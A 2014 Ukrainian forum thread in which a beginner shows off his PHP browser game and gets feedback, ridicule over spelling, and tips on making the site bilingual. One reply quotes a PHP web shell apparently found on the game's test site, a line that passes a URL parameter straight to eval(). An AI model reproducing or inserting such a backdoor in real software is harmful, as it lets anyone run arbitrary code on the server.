1 Востаннє редагувалося Faraon (11.01.2014 01:49:00)

Тема: Створення браузерки

Привіт всім. Давно я вже не писав на форумі) Ось вирішим написати про свою браузерку! Що я вже створив та спитати що ще потрібно створити.
Створено:
Реєстація, створено персонажа (100%), локації (30 локацій), инвентарь (65%), пошук по гравцях (100%), настройки профиля, адмінку (80%), бої між гравцями, бої з ботом, добавлено 1 квест (на днях добавлю ще кілька квестів).
Здається все що зроблено я вказав. Дуже хочеться мені вже на хостинг її викласти, але сумніваюся що це хороша ідея. Я коли буду викладати на хост тоді напевне закажу собі платний опцію за 24грн в місяць
http://www.hostinger.com.ua/
Що ви мені порадите? Що ще бажано додати в ігру перед її народженням? Всі баги збираюся усувати по ходу їх виявлення.
Виклав скрипт на безплатному хостингу (тільки він на даний час не працює, завтра якщо не забуду то виправлю баги)
http://middleages.96.lt/
Чекаю коментарів!!!

2

Re: Створення браузерки

ще забув написати що перед викладенням скрипта на платний хостинг весь текст перевірю на грамотність і зроблю скрипт двомовним!

3

Re: Створення браузерки

я б радив спочатку змінити 2 речі

1. ununtu 13.10 firefox 26.0

Незнаю як в інших браузерах а в цьому, кодування верхнього фрейму utf-8 а нижнього cp-1251, причому по замовчуванню вибирається cp-1251. І ще на цій сторінці http://middleages.96.lt/game.php?go=map при переході на більшість посиланнь чомусь видає 404 помилку.

Подякували: Faraon1

4

Re: Створення браузерки

Те ж саме.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Faraon1

5

Re: Створення браузерки

Найбільше зі всього сподобалось ось це: http://cdn.joxi.ru/uploads/prod/2014/01/11/e96/428/1a557070d6c9bfd80ad0c77ce735d20284f11e13.jpg

"Most good programmers do programming not because they expect to get paid or get adulation by the public, but because it is fun to program."
- Linus Torvalds
Подякували: Faraon, miroslav.chandler, karmeljuk3

6

Re: Створення браузерки

Logans написав:

Найбільше зі всього сподобалось ось це: http://cdn.joxi.ru/uploads/prod/2014/01/11/e96/428/1a557070d6c9bfd80ad0c77ce735d20284f11e13.jpg

воєнна хитрість: перекладачі, перш ніж публікувати переклад, пропускають текст через гугл
таким чином, гугл - не тільки пошукова система, а й грамар-детект

Психологічні бесіди з додатковою послугою промивання мізків. Недорого.
Не дизайню. Взагалі ні разу. У назві розділу "Дизайн та графіка" є слово "графіка" - ось тут трохи шарю. І не більше. Так, часто питають.
Продам гараж
Подякували: Faraon1

7

Re: Створення браузерки

Logans написав:

Найбільше зі всього сподобалось ось це: http://cdn.joxi.ru/uploads/prod/2014/01/11/e96/428/1a557070d6c9bfd80ad0c77ce735d20284f11e13.jpg

Та знаю я... ))))) Скрипт на данний момент запущений в тестовому режимі! Всі граматичні помилки я буду виправляти! Сьогодні виправлю!

8

Re: Створення браузерки

ох, там стільки помилок, це, навіть, гірше за суржик, страшно подумати, який там код буде, якщо ви робите такі помилки в простому тексті

Севодне бил создан первий ескиз персонажа

All you want is a dingle,
What you envy's a schwang,
A thing through which you can tinkle,
Or play with, or simply let hang...
Подякували: Chemist-i, Faraon2

9

Re: Створення браузерки

FakiNyan написав:

ох, там стільки помилок, це, навіть, гірше за суржик, страшно подумати, який там код буде, якщо ви робите такі помилки в простому тексті

Севодне бил создан первий ескиз персонажа

Головне, щоб код слухався свого "аффтара".

I belong to the Dead Generation.

10

Re: Створення браузерки

Bartash написав:
FakiNyan написав:

ох, там стільки помилок, це, навіть, гірше за суржик, страшно подумати, який там код буде, якщо ви робите такі помилки в простому тексті

Севодне бил создан первий ескиз персонажа

Головне, щоб код слухався свого "аффтара".

Автор коду той-же, що і аФФтор перекладу, т.е. Гугловський

x

11

Re: Створення браузерки

Ось яку помилку я поюачив:

Ось вирішим написати про свою браузерку! Що я вже створив та спитати що ще потрібно створити.

Має бути так:

Ось вирішив написати про створену вами браузерку! Що я уже накопіював та спитати які куски коду можна ще скопіювати.

Можливо трохи жорстоко але: якщо програміст (навіть новачок) не знає чим в РНР відрізняється $_GET[loc] від $_GET['loc'] тоді малоймовірно що інший код автор сам писав. Ось така сумна історія цієї ігри.

Подякували: miroslav.chandler1

12

Re: Створення браузерки

funivan написав:

Має бути так:

Ось вирішив написати про створену вами браузерку! Що я уже накопіював та спитати які куски коду можна ще скопіювати.

Можливо трохи жорстоко але: якщо програміст (навіть новачок) не знає чим в РНР відрізняється $_GET[loc] від $_GET['loc'] тоді малоймовірно що інший код автор сам писав. Ось така сумна історія цієї ігри.

Project leader не зобов'язаний знати всі нюанси написаного командою коду, але відповідає за злагодженість роботи в цілому.

Подякували: bunyk, miroslav.chandler, Faraon3

13

Re: Створення браузерки

koala написав:
funivan написав:

Має бути так:

Ось вирішив написати про створену вами браузерку! Що я уже накопіював та спитати які куски коду можна ще скопіювати.

Можливо трохи жорстоко але: якщо програміст (навіть новачок) не знає чим в РНР відрізняється $_GET[loc] від $_GET['loc'] тоді малоймовірно що інший код автор сам писав. Ось така сумна історія цієї ігри.

Project leader не зобов'язаний знати всі нюанси написаного командою коду, але відповідає за злагодженість роботи в цілому.

Та, купа оргроботи: і графік робіт розподіли, і бюджетування, і ризики обчислити...

I belong to the Dead Generation.
Подякували: koala1

14

Re: Створення браузерки

Bartash написав:

і ризики обчислити...

Так, за таке і по морді можна...

15

Re: Створення браузерки

koala написав:
Bartash написав:

і ризики обчислити...

Так, за таке і по морді можна...

Колір був у контексті теми, пардон. :)

I belong to the Dead Generation.

16 Востаннє редагувалося Faraon (11.01.2014 22:18:33)

Re: Створення браузерки

У виникло питання. А як зробити сайт двомовним?
м... напевне потрібно робити так...
Користувач записує в відповідне поле в базі текст "ua" або "ru", а далі всю ди де є текст робиться перевірка:

if ($країна == "ua") {echo "Привіт";}
if ($країна == "ru") {echo "Привет";}

так???

17

Re: Створення браузерки

funivan написав:

Ось яку помилку я поюачив:

Ось вирішим написати про свою браузерку! Що я вже створив та спитати що ще потрібно створити.

Має бути так:

Ось вирішив написати про створену вами браузерку! Що я уже накопіював та спитати які куски коду можна ще скопіювати.

Можливо трохи жорстоко але: якщо програміст (навіть новачок) не знає чим в РНР відрізняється $_GET[loc] від $_GET['loc'] тоді малоймовірно що інший код автор сам писав. Ось така сумна історія цієї ігри.

95% коду написано мною інші 5% мені допомогли користувачі форуму!

18

Re: Створення браузерки

$країна

Ви це серйозно?

...
Прапор 1С замайорів на обрії...
I belong to the Dead Generation.
Подякували: miroslav.chandler1

19 Востаннє редагувалося koala (11.01.2014 23:07:11)

Re: Створення браузерки

Faraon написав:

У виникло питання. А як зробити сайт двомовним?
м... напевне потрібно робити так...
Користувач записує в відповідне поле в базі текст "ua" або "ru", а далі всю ди де є текст робиться перевірка:

if ($країна == "ua") {echo "Привіт";}
if ($країна == "ru") {echo "Привет";}

так???

Ну, це надмірна праця буде.
Простий спосіб такий: створюєте додатковий файл, інклудаєте його в усі файли, де треба перекладати. В файлі вписуєте всі рядки, що треба перекладати, і функцію для перекладу, десь так:

_names["Привіт"]["ru"]="Привет";
function _t($text)
{
  return isset(_names[$text][$країна])?_names[$text][$країна]:$text;
}

а в коді - просто пишете

echo _t("Привіт");

функція "чарівним способом" все розрулить :)

Ну і звісно що не треба користувачеві нічого писати, це має бути внутрішня змінна, користувач має тільки на кнопку чи посилання тицнути.

Подякували: Faraon1

20 Востаннє редагувалося Faraon (12.01.2014 01:42:17)

Re: Створення браузерки

Bartash написав:

$країна

Ви це серйозно?

...
Прапор 1С замайорів на обрії...

Та не чіпляйтеся вже так серйозно до того що я пишу))))
Якщо вам так не подобається то нехай буде так:

if ($country == "ua") {echo "Привіт";}
if ($country == "ru") {echo "Привет";}